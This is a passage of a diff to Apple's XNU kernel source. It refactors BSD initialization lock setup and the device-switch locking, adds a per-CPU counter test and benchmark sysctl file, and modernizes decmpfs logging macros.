to register sysctls - */ -void -bsd_early_init(void) -{ - sysctl_early_init(); -} - /* * This function is called very early on in the Mach startup, from the * function start_kernel_threads() in osfmk/kern/startup.c. It's called @@ -562,9 +535,6 @@ bsd_init(void) bsd_init_kprintf("calling procinit\n"); procinit(); - /* Initialize the ttys (MUST be before kminit()/bsd_autoconf()!)*/ - tty_init(); - /* kernel_task->proc = kernproc; */ set_bsdtask_info(kernel_task, (void *)kernproc); @@ -572,38 +542,15 @@ bsd_init(void) bsd_init_kprintf("calling process_name\n"); process_name("kernel_task", kernproc); - /* allocate proc lock group attribute and group */ - bsd_init_kprintf("calling lck_grp_attr_alloc_init\n"); - proc_lck_grp_attr = lck_grp_attr_alloc_init(); - - proc_lck_grp = lck_grp_alloc_init("proc", proc_lck_grp_attr); - - proc_slock_grp = lck_grp_alloc_init("proc-slock", proc_lck_grp_attr); - proc_ucred_mlock_grp = lck_grp_alloc_init("proc-ucred-mlock", proc_lck_grp_attr); - proc_mlock_grp = lck_grp_alloc_init("proc-mlock", proc_lck_grp_attr); - proc_fdmlock_grp = lck_grp_alloc_init("proc-fdmlock", proc_lck_grp_attr); - proc_kqhashlock_grp = lck_grp_alloc_init("proc-kqhashlock", proc_lck_grp_attr); - proc_knhashlock_grp = lck_grp_alloc_init("proc-knhashlock", proc_lck_grp_attr); - proc_dirslock_grp = lck_grp_alloc_init("proc-dirslock", proc_lck_grp_attr); -#if CONFIG_XNUPOST - sysctl_debug_test_stackshot_owner_grp = lck_grp_alloc_init("test-stackshot-owner-grp", LCK_GRP_ATTR_NULL); - sysctl_debug_test_stackshot_owner_init_mtx = lck_mtx_alloc_init( - sysctl_debug_test_stackshot_owner_grp, - LCK_ATTR_NULL); -#endif /* !CONFIG_XNUPOST */ /* Allocate proc lock attribute */ - proc_lck_attr = lck_attr_alloc_init(); - proc_list_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr); - proc_klist_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr); - lck_mtx_init(&kernproc->p_mlock, proc_mlock_grp, proc_lck_attr); - lck_mtx_init(&kernproc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr); - lck_mtx_init(&kernproc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr); - lck_spin_init(&kernproc->p_slock, proc_slock_grp, proc_lck_attr); - lck_rw_init(&kernproc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr); + lck_mtx_init(&kernproc->p_mlock, &proc_mlock_grp, &proc_lck_attr); + lck_mtx_init(&kernproc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr); + lck_mtx_init(&kernproc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr); + lck_spin_init(&kernproc->p_slock, &proc_slock_grp, &proc_lck_attr); + lck_rw_init(&kernproc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr); assert(bsd_simul_execs != 0); - execargs_cache_lock = lck_mtx_alloc_init(proc_lck_grp, proc_lck_attr); execargs_cache_size = bsd_simul_execs; execargs_free_count = bsd_simul_execs; execargs_cache = zalloc_permanent(bsd_simul_execs * sizeof(vm_offset_t), @@ -634,10 +581,6 @@ bsd_init(void) ulock_initialize(); - hostname_lck_grp = lck_grp_alloc_init("hostname", LCK_GRP_ATTR_NULL); - lck_mtx_init(&hostname_lock, hostname_lck_grp, LCK_ATTR_NULL); - lck_mtx_init(&domainname_lock, hostname_lck_grp, LCK_ATTR_NULL); - /* * Create process 0. */ @@ -646,7 +589,7 @@ bsd_init(void) kernproc->p_pgrp = &pgrp0; LIST_INSERT_HEAD(PGRPHASH(0), &pgrp0, pg_hash); LIST_INIT(&pgrp0.pg_members); - lck_mtx_init(&pgrp0.pg_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&pgrp0.pg_mlock, &proc_mlock_grp, &proc_lck_attr); /* There is no other bsd thread this point and is safe without pgrp lock */ LIST_INSERT_HEAD(&pgrp0.pg_members, kernproc, p_pglist); kernproc->p_listflag |= P_LIST_INPGRP; @@ -659,7 +602,7 @@ bsd_init(void) session0.s_count = 1; session0.s_leader = kernproc; session0.s_listflags = 0; - lck_mtx_init(&session0.s_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&session0.s_mlock, &proc_mlock_grp, &proc_lck_attr); LIST_INSERT_HEAD(SESSHASH(0), &session0, s_hash); proc_list_unlock(); @@ -729,9 +672,6 @@ bsd_init(void) TAILQ_INIT(&kernproc->p_aio_doneq); kernproc->p_aio_total_count = 0; - bsd_init_kprintf("calling file_lock_init\n"); - file_lock_init(); - #if CONFIG_MACF mac_cred_label_associate_kernel(kernproc->p_ucred); #endif @@ -743,8 +683,8 @@ bsd_init(void) filedesc0.fd_knlist = NULL; filedesc0.fd_knhash = NULL; filedesc0.fd_knhashmask = 0; - lck_mtx_init(&filedesc0.fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr); - lck_mtx_init(&filedesc0.fd_knhashlock, proc_knhashlock_grp, proc_lck_attr); + lck_mtx_init(&filedesc0.fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr); + lck_mtx_init(&filedesc0.fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr); /* Create the limits structures. */ kernproc->p_limit = &limit0; @@ -792,9 +732,6 @@ bsd_init(void) } } - bsd_init_kprintf("calling fpxlog_init\n"); - fpxlog_init(); - /* * Initialize buffers and hash links for buffers * @@ -815,10 +752,6 @@ bsd_init(void) bsd_init_kprintf("calling vfsinit\n"); vfsinit(); - /* Initialize file locks. */ - bsd_init_kprintf("calling lf_init\n"); - lf_init(); - #if CONFIG_PROC_UUID_POLICY /* Initial proc_uuid_policy subsystem */ bsd_init_kprintf("calling proc_uuid_policy_init()\n"); @@ -857,34 +790,12 @@ bsd_init(void) bsd_init_kprintf("calling aio_init\n"); aio_init(); - /* Initialize SysV shm subsystem locks; the subsystem proper is - * initialized through a sysctl. - */ -#if SYSV_SHM - bsd_init_kprintf("calling sysv_shm_lock_init\n"); - sysv_shm_lock_init(); -#endif -#if SYSV_SEM - bsd_init_kprintf("calling sysv_sem_lock_init\n"); - sysv_sem_lock_init(); -#endif -#if SYSV_MSG - bsd_init_kprintf("sysv_msg_lock_init\n"); - sysv_msg_lock_init(); -#endif - bsd_init_kprintf("calling pshm_lock_init\n"); - pshm_lock_init(); - bsd_init_kprintf("calling psem_lock_init\n"); - psem_lock_init(); - pthread_init(); /* POSIX Shm and Sem */ bsd_init_kprintf("calling pshm_cache_init\n"); pshm_cache_init(); bsd_init_kprintf("calling psem_cache_init\n"); psem_cache_init(); - bsd_init_kprintf("calling time_zone_slock_init\n"); - time_zone_slock_init(); bsd_init_kprintf("calling select_waitq_init\n"); select_waitq_init(); @@ -920,6 +831,10 @@ bsd_init(void) kernproc->p_fd->fd_cdir = NULL; kernproc->p_fd->fd_rdir = NULL; +#if defined (__x86_64__) && (DEBUG || DEVELOPMENT) + hvg_bsd_init(); +#endif /* DEBUG || DEVELOPMENT */ + #if CONFIG_FREEZE #ifndef CONFIG_MEMORYSTATUS #error "CONFIG_FREEZE defined without matching CONFIG_MEMORYSTATUS" @@ -935,18 +850,12 @@ bsd_init(void) memorystatus_init(); #endif /* CONFIG_MEMORYSTATUS */ - bsd_init_kprintf("calling acct_init\n"); - acct_init(); - bsd_init_kprintf("calling sysctl_mib_init\n"); sysctl_mib_init(); bsd_init_kprintf("calling bsd_autoconf\n"); bsd_autoconf(); - bsd_init_kprintf("calling os_reason_init\n"); - os_reason_init(); - #if CONFIG_DTRACE dtrace_postinit(); #endif @@ -1057,9 +966,9 @@ bsd_init(void) (void)vnode_ref(init_rootvnode); (void)vnode_put(init_rootvnode); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); set_rootvnode(init_rootvnode); - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); init_rootvnode = NULLVP; /* use rootvnode after this point */ @@ -1176,6 +1085,7 @@ bsd_init(void) if (bsdmgroot_bootable()) { int error; bool rooted_dmg = false; + bool skip_signature_check = false; printf("trying to find and mount BaseSystem dmg as root volume\n"); #if DEVELOPMENT || DEBUG @@ -1188,7 +1098,7 @@ bsd_init(void) panic("%s: M_NAMEI zone exhausted", __FUNCTION__); } - error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg); + error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg, &skip_signature_check); if (error) { bsd_init_kprintf("failed to to find BaseSystem dmg: error = %d\n", error); } else { @@ -1196,7 +1106,7 @@ bsd_init(void) bsd_init_kprintf("found BaseSystem dmg at: %s\n", dmgpath); - error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg); + error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg, skip_signature_check); if (error) { bsd_init_kprintf("couldn't mount BaseSystem dmg: error = %d", error); } @@ -1246,9 +1156,6 @@ bsd_init(void) consider_zone_gc(FALSE); #endif - /* Initialize System Override call */ - init_system_override(); - bsd_init_kprintf("done\n"); } @@ -1361,6 +1268,9 @@ bsd_utaskbootstrap(void) panic("bsd_utaskbootstrap: initproc not set\n"); } #endif + + zalloc_first_proc_made(); + /* * Since we aren't going back out the normal way to our parent, * we have to drop the transition locks explicitly. @@ -1475,12 +1385,6 @@ parse_bsd_args(void) } #endif -#if OS_REASON_DEBUG - if (PE_parse_boot_argn("-disable_osreason_debug", namep, sizeof(namep))) { - os_reason_debug_disabled = 1; - } -#endif - PE_parse_boot_argn("sigrestrict", &sigrestrict_arg, sizeof(sigrestrict_arg)); #if DEVELOPMENT || DEBUG @@ -1585,20 +1489,26 @@ extern const char *IOGetBootObjectsPath(void); // BaseSystem.dmg into its argument (which must be a char[MAXPATHLEN]). static int -bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) +bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check) { int error; size_t len; char *dmgbasepath; char *dmgpath; + bool allow_rooted_dmg = false; dmgbasepath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK); dmgpath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK); vnode_t imagevp = NULLVP; +#if DEVELOPMENT || DEBUG + allow_rooted_dmg = true; +#endif + //must provide output bool - if (rooted_dmg) { + if (rooted_dmg && skip_signature_check) { *rooted_dmg = false; + *skip_signature_check = false; } else { error = EINVAL; goto done; @@ -1615,6 +1525,11 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) goto done; } + if (csr_check(CSR_ALLOW_ANY_RECOVERY_OS) == 0) { + *skip_signature_check = true; + allow_rooted_dmg = true; + } + #if defined(__arm64__) const char *boot_obj_path = IOGetBootObjectsPath(); if (boot_obj_path) { @@ -1634,26 +1549,27 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) goto done; } -#if DEVELOPMENT || DEBUG - len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + if (allow_rooted_dmg) { + len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); - if (error == 0) { - *rooted_dmg = true; - goto done; + error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); + if (error == 0) { + *rooted_dmg = true; + *skip_signature_check = true; + goto done; + } + memset(dmgpath, 0, MAXPATHLEN); } - memset(dmgpath, 0, MAXPATHLEN); -#endif // DEVELOPMENT || DEBUG len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); if (len > MAXPATHLEN) { @@ -1688,27 +1604,28 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) goto done; } -#if DEVELOPMENT || DEBUG - // Try BaseSystem.rooted.dmg - len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + if (allow_rooted_dmg) { + // Try BaseSystem.rooted.dmg + len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); - if (error == 0) { - // we found it! success! - *rooted_dmg = true; - goto done; + error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); + if (error == 0) { + // we found it! success! + *rooted_dmg = true; + *skip_signature_check = true; + goto done; + } } -#endif // DEVELOPMENT || DEBUG // Try BaseSystem.dmg len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); diff --git a/bsd/kern/bsd_stubs.c b/bsd/kern/bsd_stubs.c index 3b8290fc5..a08f4c823 100644 --- a/bsd/kern/bsd_stubs.c +++ b/bsd/kern/bsd_stubs.c @@ -45,40 +45,25 @@ /* XXX these should be in a common header somwhere, but aren't */ extern int chrtoblk_set(int, int); -extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *); /* XXX most of these just exist to export; there's no good header for them*/ void pcb_synch(void); -TAILQ_HEAD(, devsw_lock) devsw_locks; -lck_mtx_t devsw_lock_list_mtx; -lck_grp_t * devsw_lock_grp; +typedef struct devsw_lock { + TAILQ_ENTRY(devsw_lock) dl_list; + thread_t dl_thread; + dev_t dl_dev; + int dl_mode; + int dl_waiters; +} *devsw_lock_t; + +static LCK_GRP_DECLARE(devsw_lock_grp, "devsw"); +static LCK_MTX_DECLARE(devsw_lock_list_mtx, &devsw_lock_grp); +static TAILQ_HEAD(, devsw_lock) devsw_locks = TAILQ_HEAD_INITIALIZER(devsw_locks); /* Just to satisfy pstat command */ int dmmin, dmmax, dmtext; -vm_offset_t -kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err) -{ - vm_offset_t addr = 0; - kern_return_t kr = KERN_SUCCESS; - - if (!physContig) { - kr = kernel_memory_allocate(mbmap, &addr, size, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); - } else { - kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); - } - - if (kr != KERN_SUCCESS) { - addr = 0; - } - if (err) { - *err = kr; - } - - return addr; -} - /* * XXX this function only exists to be exported and do nothing. */ @@ -366,72 +351,84 @@ bsd_hostname(char *buf, size_t bufsize, size_t *len) return ret; } +static devsw_lock_t +devsw_lock_find_locked(dev_t dev, int mode) +{ + devsw_lock_t lock; + + TAILQ_FOREACH(lock, &devsw_locks, dl_list) { + if (lock->dl_dev == dev && lock->dl_mode == mode) { + return lock; + } + } + + return NULL; +} + void devsw_lock(dev_t dev, int mode) { - devsw_lock_t newlock, tmplock; - int res; + devsw_lock_t newlock, curlock; assert(0 <= major(dev) && major(dev) < nchrdev); assert(mode == S_IFCHR || mode == S_IFBLK); - MALLOC(newlock, devsw_lock_t, sizeof(struct devsw_lock), M_TEMP, M_WAITOK | M_ZERO); + newlock = kalloc_flags(sizeof(struct devsw_lock), Z_WAITOK | Z_ZERO); newlock->dl_dev = dev; newlock->dl_thread = current_thread(); newlock->dl_mode = mode; lck_mtx_lock_spin(&devsw_lock_list_mtx); -retry: - TAILQ_FOREACH(tmplock, &devsw_locks, dl_list) - { - if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) { - res = msleep(tmplock, &devsw_lock_list_mtx, PVFS, "devsw_lock", NULL); - assert(res == 0); - goto retry; - } + + curlock = devsw_lock_find_locked(dev, mode); + if (curlock == NULL) { + TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list); + } else { + curlock->dl_waiters++; + lck_mtx_sleep_with_inheritor(&devsw_lock_list_mtx, + LCK_SLEEP_SPIN, curlock, curlock->dl_thread, + THREAD_UNINT | THREAD_WAIT_NOREPORT, + TIMEOUT_WAIT_FOREVER); + assert(curlock->dl_thread == current_thread()); + curlock->dl_waiters--; } - TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list); lck_mtx_unlock(&devsw_lock_list_mtx); + + if (curlock != NULL) { + kfree(newlock, sizeof(struct devsw_lock)); + } } + void devsw_unlock(dev_t dev, int mode) { - devsw_lock_t tmplock; + devsw_lock_t lock; + thread_t inheritor_thread = NULL; assert(0 <= major(dev) && major(dev) < nchrdev); lck_mtx_lock_spin(&devsw_lock_list_mtx); - TAILQ_FOREACH(tmplock, &devsw_locks, dl_list) - { - if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) { - break; - } - } + lock = devsw_lock_find_locked(dev, mode); - if (tmplock == NULL) { - panic("Trying to unlock, and couldn't find lock."); + if (lock == NULL || lock->dl_thread != current_thread()) { + panic("current thread doesn't own the lock (%p)", lock); } - if (tmplock->dl_thread != current_thread()) { - panic("Trying to unlock, but I don't hold the lock."); + if (lock->dl_waiters) { + wakeup_one_with_inheritor(lock, THREAD_AWAKENED, + LCK_WAKE_DEFAULT, &lock->dl_thread); + inheritor_thread = lock->dl_thread; + lock = NULL; + } else { + TAILQ_REMOVE(&devsw_locks, lock, dl_list); } - wakeup(tmplock); - TAILQ_REMOVE(&devsw_locks, tmplock, dl_list); - lck_mtx_unlock(&devsw_lock_list_mtx); - FREE(tmplock, M_TEMP); -} - -void -devsw_init() -{ - devsw_lock_grp = lck_grp_alloc_init("devsw", NULL); - assert(devsw_lock_grp != NULL); - - lck_mtx_init(&devsw_lock_list_mtx, devsw_lock_grp, NULL); - TAILQ_INIT(&devsw_locks); + if (inheritor_thread) { + thread_deallocate(inheritor_thread); + } + kfree(lock, sizeof(struct devsw_lock)); } diff --git a/bsd/kern/counter_test.c b/bsd/kern/counter_test.c new file mode 100644 index 000000000..db9f8ee08 --- /dev/null +++ b/bsd/kern/counter_test.c @@ -0,0 +1,280 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +/* sysctl interface for testing percpu counters in DEBUG or DEVELOPMENT kernel only. */ +#if !(DEVELOPMENT || DEBUG) +#error "Counter testing is not enabled on RELEASE configurations" +#endif + +#include +#include +#include +#include +#include +#include + +#include + +#ifdef CONFIG_XNUPOST +#include +#endif /* CONFIG_XNUPOST */ + +static _Atomic boolean_t scalable_counter_test_running = FALSE; +scalable_counter_t test_scalable_counter; + +SCALABLE_COUNTER_DEFINE(test_static_scalable_counter); + +#ifdef CONFIG_XNUPOST +kern_return_t counter_tests(void); +/* + * Sanity test that a counter can be modified before zalloc is initialized. + */ +static void +bump_static_counter(void* arg) +{ + (void) arg; + counter_inc(&test_static_scalable_counter); +} + +STARTUP_ARG(PMAP_STEAL, STARTUP_RANK_MIDDLE, bump_static_counter, NULL); + +kern_return_t +counter_tests() +{ + T_ASSERT_EQ_ULLONG(counter_load(&test_static_scalable_counter), 1, "Counter was incremented"); + return KERN_SUCCESS; +} +#endif /* CONFIG_XNUPOST */ + +static int +sysctl_scalable_counter_test_start SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int ret_val = 1; + int error = 0; + boolean_t exclusive; + error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL); + if (error || !req->newptr) { + return error; + } + /* The test doesn't support being run multiple times in parallel. */ + exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, FALSE, TRUE, seq_cst); + if (!exclusive) { + os_log(OS_LOG_DEFAULT, "scalable_counter_test: Caught attempt to run the test in parallel."); + return EINVAL; + } + counter_alloc(&test_scalable_counter); + return 0; +} + +static int +sysctl_scalable_counter_test_finish SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + boolean_t exclusive; + int ret_val = 0; + int error = 0; + error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL); + if (error || !req->newptr) { + return error; + } + + /* The test doesn't support being run multiple times in parallel. */ + exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, TRUE, FALSE, seq_cst); + if (!exclusive) { + /* Finish called without start. */ + return EINVAL; + } + return 0; +} + +static int +sysctl_scalable_counter_add SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int64_t value = 0; + int error = 0; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL); + if (error || !req->newptr) { + return error; + } + counter_add(&test_scalable_counter, value); + return 0; +} + +static int +sysctl_static_scalable_counter_add SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int64_t value = 0; + int error = 0; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL); + if (error || !req->newptr) { + return error; + } + counter_add(&test_static_scalable_counter, value); + return 0; +} + +static int +sysctl_scalable_counter_load SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + uint64_t value; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + value = counter_load(&test_scalable_counter); + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +static int +sysctl_scalable_counter_write_benchmark SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int error; + int64_t iterations; + int ret_val = 0; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL); + if (error || !req->newptr) { + return error; + } + for (int64_t i = 0; i < iterations; i++) { + counter_inc(&test_scalable_counter); + } + return 0; +} + +static volatile uint64_t racy_counter; + +static int +sysctl_racy_counter_write_benchmark SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int error; + int64_t iterations; + int ret_val = 0; + error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL); + if (error || !req->newptr) { + return error; + } + for (int64_t i = 0; i < iterations; i++) { + racy_counter++; + } + return 0; +} + +static int +sysctl_racy_counter_load SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + uint64_t value = racy_counter; + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +static _Atomic uint64_t atomic_counter; + +static int +sysctl_atomic_counter_write_benchmark SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int error; + int64_t iterations; + int ret_val = 0; + error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL); + if (error || !req->newptr) { + return error; + } + for (int64_t i = 0; i < iterations; i++) { + os_atomic_add(&atomic_counter, 1, relaxed); + } + return 0; +} + +static int +sysctl_atomic_counter_load SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + uint64_t value = os_atomic_load_wide(&atomic_counter, relaxed); + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_start, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_test_start, "I", "Setup per-cpu counter test"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_finish, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_test_finish, "I", "Finish per-cpu counter test"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_add, + CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_add, "I", "Perform an add on the per-cpu counter"); + +SYSCTL_PROC(_kern, OID_AUTO, static_scalable_counter_test_add, + CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_static_scalable_counter_add, "I", "Perform an add on the static per-cpu counter"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_load, + CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_load, "I", "Load the current per-cpu counter value."); + +SYSCTL_SCALABLE_COUNTER(_kern, static_scalable_counter_test_load, + test_static_scalable_counter, "Load the current static per-cpu counter value."); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_write_benchmark, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_write_benchmark, "I", "Per-cpu counter write benchmark"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_benchmark, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_racy_counter_write_benchmark, "I", "Global counter racy benchmark"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_load, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_racy_counter_load, "I", "Global counter racy load"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_write_benchmark, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_atomic_counter_write_benchmark, "I", "Atomic counter write benchmark"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_load, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_atomic_counter_load, "I", "Atomic counter load"); diff --git a/bsd/kern/decmpfs.c b/bsd/kern/decmpfs.c index 4040d9b6a..1f5bc434f 100644 --- a/bsd/kern/decmpfs.c +++ b/bsd/kern/decmpfs.c @@ -80,22 +80,6 @@ UNUSED_SYMBOL(decmpfs_validate_compressed_file) #define COMPRESSION_DEBUG_VERBOSE 0 #define MALLOC_DEBUG 0 -static const char * -baseName(const char *path) -{ - if (!path) { - return NULL; - } - const char *ret = path; - int i; - for (i = 0; path[i] != 0; i++) { - if (path[i] == '/') { - ret = &path[i + 1]; - } - } - return ret; -} - #if COMPRESSION_DEBUG static char* vnpath(vnode_t vp, char *path, int len) @@ -108,11 +92,21 @@ vnpath(vnode_t vp, char *path, int len) } #endif -#define ErrorLog(x, args...) printf("%s:%d:%s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, ## args) +#define ErrorLog(x, args...) \ + printf("%s:%d:%s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, ## args) #if COMPRESSION_DEBUG -#define ErrorLogWithPath(x, args...) do { char *path; MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, vnpath(vp, path, PATH_MAX), ## args); FREE(path, M_TEMP); } while(0) +#define ErrorLogWithPath(x, args...) do { \ + char *path = zalloc(ZV_NAMEI); \ + printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \ + vnpath(vp, path, PATH_MAX), ## args); \ + zfree(ZV_NAMEI, path); \ +} while(0) #else -#define ErrorLogWithPath(x, args...) do { (void*)vp; printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, "", ## args); } while(0) +#define ErrorLogWithPath(x, args...) do { \ + (void*)vp; \ + printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \ + "", ## args); \ +} while(0) #endif #if COMPRESSION_DEBUG @@ -131,88 +125,14 @@ vnpath(vnode_t vp, char *path, int len) #define VerboseLogWithPath(x...) do { } while(0) #endif -#if MALLOC_DEBUG - -static SInt32 totalAlloc; - -typedef struct { - uint32_t allocSz; - uint32_t magic; - const char *file; - int line; -} allocated; - -static void * -_malloc(uint32_t sz, 